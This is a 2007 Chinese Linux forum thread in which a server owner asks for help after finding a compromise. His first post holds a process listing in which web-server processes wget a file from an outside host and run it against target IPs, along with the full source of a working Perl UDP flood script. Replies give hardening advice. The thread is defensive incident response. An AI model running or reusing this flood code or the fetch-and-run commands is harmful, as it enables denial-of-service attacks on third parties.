Linux伊甸园论坛 » Linux/Unix系统安全 » 紧急求救！我系统是不是中招了阿？咋个办？

wuyuhua_2000 发表于 2007-9-22 11:57

紧急求救！我系统是不是中招了阿？咋个办？

系统:centos4   apache2.2.6+php4.4.7

ps -axuf 查看:

root      4826  0.0  0.1 11372 4932 ?        Ss   Sep11   0:07 /usr/local/httpd/bin/httpd -k start
nobody   18607  0.0  0.1 12240 5204 ?        S    07:55   0:01  \_ /usr/local/httpd/bin/httpd -k start
nobody   18730  0.0  0.0  6312 1060 ?        S    08:24   0:00  |   \_ sh -c cd /tmp;./udp.pl 200.149.101.147 53 200
nobody   18731  100  0.0  7172 2212 ?        R    08:24  46:24  |       \_ /usr/bin/perl ./udp.pl 200.149.101.147 53 200
nobody   18612  0.0  0.1 12232 5188 ?        S    07:55   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18714  0.0  0.0  6092 1060 ?        S    08:23   0:00  |   \_ sh -c cd /tmp;wget bym.t35.com/ddos/udp.pl;chmod 777 u
nobody   18715  0.0  0.0  7460 1604 ?        S    08:23   0:00  |       \_ wget bym.t35.com/ddos/udp.pl
nobody   18642  0.0  0.1 12304 5180 ?        S    08:08   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18646  0.0  0.0  6388 1060 ?        S    08:11   0:00  |   \_ sh -c cd /tmp;wget [url]http://bym.t35.com/ddos/udp.pl[/url]
nobody   18647  0.0  0.0  7508 1608 ?        S    08:11   0:00  |       \_ wget [url]http://bym.t35.com/ddos/udp.pl[/url]
nobody   18655  0.0  0.1 12356 5188 ?        S    08:12   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18686  0.0  0.0  7240 1056 ?        S    08:15   0:00  |   \_ sh -c cd /tmp;perl udp.pl 200.149.101.148 80 500
nobody   18687 99.8  0.0  7544 2212 ?        R    08:15  54:58  |       \_ perl udp.pl 200.149.101.148 80 500
nobody   18695  0.0  0.1 12356 5180 ?        S    08:18   0:00  \_ /usr/local/httpd/bin/httpd -k start
nobody   18712  0.0  0.0  6460 1060 ?        S    08:22   0:00  |   \_ sh -c cd /tmp;wget bym.t35.com/ddos/udp.pl;chmod 777 u
nobody   18713  0.0  0.0  8624 1588 ?        S    08:22   0:00  |       \_ wget bym.t35.com/ddos/udp.pl



在tmp 目录下面有 udp.pl文件，内容如下：

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (; {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (; {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

大家帮忙看看
什么原因阿？刚开始以为是php和apache得版本太低，昨天刚升级到最新版本，还是这样！

wuyuhua_2000 发表于 2007-9-22 11:58

同时还打开了一个udp 端口，端口运行的是 ./bash
把进程杀死后，udp端口也就关闭了。

bwb 发表于 2007-9-22 15:25

是有点可疑
[code]#last[/code]
看看怎么说。

Roc.Ken 发表于 2007-9-22 15:26

bash 的端口应该是TCP的吧

你检查一下 web服务 是不是有任意用户可上传的漏洞.
他们利用了 httpd 的漏洞来调用程序实现攻击, 应该还没有进入你的系统.

wuyuhua_2000 发表于 2007-9-22 17:36

netstat查看是udp端口，3万以上的

last 查看没有任何可疑登陆

wuyuhua_2000 发表于 2007-9-22 17:38

“你检查一下 web服务 是不是有任意用户可上传的漏洞” 这个怎么检查啊？
麻烦斑竹明示！谢谢！

yjuutrhe 发表于 2007-9-22 17:39

不有可疑了,中毒了没错,不知道楼主有没有装瑞星杀毒软件,如果有赶紧在安全模式下去杀,估计不会有多大问题.

bwb 发表于 2007-9-22 17:40

[quote]原帖由 [i]yjuutrhe[/i] 于 2007-9-22 17:39 发表 [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585007&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
不有可疑了,中毒了没错,不知道楼主有没有装瑞星杀毒软件,如果有赶紧在安全模式下去杀,估计不会有多大问题. [/quote]
瑞星嘛，好像还没有这个本事吧~~~

wuyuhua_2000 发表于 2007-9-22 17:45

用的是linux系统
centos 4.5

bwb 发表于 2007-9-22 17:50

[quote]原帖由 [i]wuyuhua_2000[/i] 于 2007-9-22 17:38 发表 [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585006&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
“你检查一下 web服务 是不是有任意用户可上传的漏洞” 这个怎么检查啊？
麻烦斑竹明示！谢谢！ [/quote]
查/etc/httpd（版本不同，可能目录不太一样，但是一般是这个目录）下的httpd.conf里的allow字段吧，还有Documents（放网站内容的目录）下的权限是不是变成777属性了，改成755属性。
还有，如果使用ftp上传、管理网站的话，最好改成scp（基于ssh的传输），将ftp服务器关掉。
Roc.Ken看看够不够？

bwb 发表于 2007-9-22 18:02

如果有SELinux可以开开，预防这类事情再发生。

wuyuhua_2000 发表于 2007-9-22 18:09

回复 #10 bwb 的帖子

bwb,您好！

Documents 下的文件属性是644 ,文件夹属性是 755

ftp 上传用的是vsftpd ,我查看了ftp 日志，没有异常；scp没有用过，有空学学！

wuyuhua_2000 发表于 2007-9-22 18:11

回复 #11 bwb 的帖子

安装的时候屏蔽了，不晓得有没有办法补救！

bwb 发表于 2007-9-22 18:19

[quote]原帖由 [i]wuyuhua_2000[/i] 于 2007-9-22 18:11 发表 [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585014&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
安装的时候屏蔽了，不晓得有没有办法补救！ [/quote]
我在我那攒了几个帖子，你先看看，如果还不够可以上狗狗搜一下，我的也是用狗狗搜的。SELinux的设置有一点点麻烦，不过很有效。
[url]http://www.thtbase.com/BBS/viewthread.php?tid=406&extra=page%3D1[/url]

bwb 发表于 2007-9-22 18:20

SCP也可以搜搜，把FTP废了吧。

wuyuhua_2000 发表于 2007-9-22 18:28

[quote]原帖由 [i]bwb[/i] 于 2007-9-22 18:20 发表 [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585017&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
SCP也可以搜搜，把FTP废了吧。 [/quote]

谢谢
scp很好用嘛？

wuyuhua_2000 发表于 2007-9-22 18:30

[quote]原帖由 [i]bwb[/i] 于 2007-9-22 18:19 发表 [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585016&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]

我在我那攒了几个帖子，你先看看，如果还不够可以上狗狗搜一下，我的也是用狗狗搜的。SELinux的设置有一点点麻烦，不过很有效。
[url]http://www.thtbase.com/BBS/viewthread.php?tid=406&extra=page%3D1[/url] [/quote]


当初就是觉得太复杂了，就没有整。后悔莫及啊！

bwb 发表于 2007-9-22 18:37

SELinux是有点麻烦，不过减少了入侵：
[quote]
...
什么是SELinux？SELinux全称是Security Enhanced Linux，由美国国家安全部(National Security Agency)领导开发的GPL项目，它拥有一个灵活而强制性的访问控制结构，旨在提高Linux系统的安全性，提供强健的安全保证，可防御未知攻击，据称相当于B1级的军事安全性能。比MS NT所谓的C2等高得多。
[/quote]

scp并不是很复杂，尤其是用Windows管理网站时可以用小工具WinSCP，还是比较好用的。最近我在我的笔记本上安装了ubuntu7.04，发现这上面gnome自带的工具比WinSCP还好用。

Roc.Ken 发表于 2007-9-23 01:53

[quote]原帖由 [i]wuyuhua_2000[/i] 于 2007-9-22 17:36 发表 [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585005&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
netstat查看是udp端口，3万以上的

last 查看没有任何可疑登陆 [/quote]
说明他们还在通过 httpd 执行脚本, 先把相关的程序 kill 掉:
pkill -9 perl
pkill -9 udp.pl

不知你 apache 编译时使用了哪些参数?

Roc.Ken 发表于 2007-9-23 01:53

[quote]原帖由 [i]bwb[/i] 于 2007-9-22 18:37 发表 [url=http://www.linuxeden.com/forum/redirect.php?goto=findpost&pid=585022&ptid=159084][img]http://www.linuxeden.com/forum/images/common/back.gif[/img][/url]
SELinux是有点麻烦，不过减少了入侵：


scp并不是很复杂，尤其是用Windows管理网站时可以用小工具WinSCP，还是比较好用的。最近我在我的笔记本上安装了ubuntu7.04，发现这上面gnome自带的工具比WinSCP还好用。 [/quote]

WINSCP的确好用, 我是最近才发现的.

查看完整版本: 紧急求救！我系统是不是中招了阿？咋个办？